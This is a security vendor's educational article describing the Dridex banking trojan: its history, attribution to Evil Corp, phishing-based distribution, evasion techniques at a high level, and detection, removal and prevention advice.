Dridex Malware
Published: 12/23/2025
Written by: Lizzie Danielson
What is Dridex malware?
Dridex malware is a sophisticated banking trojan designed to steal financial information and facilitate malicious activity. It typically targets businesses and individuals through phishing campaigns, causing data breaches and financial loss. Known for its adaptability and evasion tactics, Dridex remains a high-priority threat for cybersecurity defenders.
When was Dridex first discovered?
Dridex first emerged in 2014, evolving from the Cridex trojan. It was initially uncovered by security researchers monitoring malicious email campaigns aimed at distributing the malware.
Who created Dridex?
Evil Corp is attributed to the cybercriminal group operating from Russia. In December 2019, the U.S. Treasury's Office of Foreign Assets Control (OFAC) sanctioned Evil Corp, its leader Maksim Viktorovich Yakubets, and over a dozen members and facilitators. Concurrently, the U.S. Department of Justice indicted Yakubets and Evil Corp administrator Igor Turashev on criminal charges related to computer hacking and bank fraud schemes, with a record $5 million reward offered for information leading to their arrest.
These sanctions have significant defensive and compliance implications. Organizations should be aware that ransomware payments to Evil Corp-linked infrastructure may violate U.S. sanctions, potentially exposing victims to legal and financial consequences beyond the ransom itself."
What does Dridex target?
Dridex focuses on high-value financial targets, including businesses, payment processors, and individuals with access to significant funds. Its emphasis on enterprise environments highlights its intent for broad economic disruption.
Dridex distribution method
The primary method of distribution for Dridex is phishing emails embedded with malicious attachments or links. These emails often masquerade as legitimate communications, tricking victims into downloading payloads. Dridex can also spread through exploit kits and remote desktop protocol (RDP) vulnerabilities.
Technical analysis of Dridex malware
Dridex initiates infections by downloading from malicious email attachments. Once executed, it connects to its command-and-control (C2) servers for encryption keys and instructions. Its modular payload captures keystrokes, redirects web traffic, and extracts sensitive data.
Dridex is classified as one of the most technologically advanced banking trojans currently active, with its primary target being the theft of banking credentials. To maintain persistence, Dridex modifies registry values and uses process injection techniques to hide its activity. It employs five code injection techniques to masquerade itself as legitimate Windows processes (MITRE ATT&CK technique T1036) to avoid detection, including the AtomBombing technique first used in Dridex V4.
While Dridex uses advanced stealth and evasion tactics, it's primarily classified as a banking trojan with botnet capabilities rather than a rootkit. Dridex is commonly distributed through emails containing malicious Excel documents, with operations tied to other malware toolkits like Ursnif, Emotet, TrickBot, and DoppelPaymer ransomware.
Tactics, Techniques & Procedures (TTPs)
MITRE ATT&CK Techniques: T1203 - Exploitation of Vulnerabilities, T1059 - Command Execution.
Behavioral Traits: Use of polymorphic code for evasion and connection to distributed botnets.
Indicators of Compromise (IoCs)
Suspicious domains or IPs tied to C2 servers.
Malicious document hashes used for distribution.
Abnormal traffic patterns indicating system compromise.
How to know if you’re infected with Dridex?
Symptoms of a Dridex infection include slow device performance, unauthorized bank account activity, sudden appearance of rootkit files, and unexplained outbound connections originating from endpoint devices or servers.
Dridex removal instructions
For manual removal of Dridex, isolate the infected system immediately to prevent lateral movement. Use endpoint detection and response (EDR) tools to locate and remove malicious processes. Huntress 24/7 SOC tools provide real-time monitoring and advanced cleanup for Dridex infections.
Is Dridex still active?
Dridex remains active and an ongoing threat. New variants continue to surface, showcasing its adaptability through enhanced social engineering tactics and capabilities. Organizations must remain vigilant against this persistent menace.
Mitigation & prevention strategies
To prevent Dridex infections, implement regular patching of vulnerable software, enforce multi-factor authentication (MFA), and conduct robust phishing awareness training. Network monitoring and managed detection and response (MDR) services like Huntress can detect suspicious activity and mitigate threats before significant damage occurs.
Related educational articles & videos
Dridex FAQs
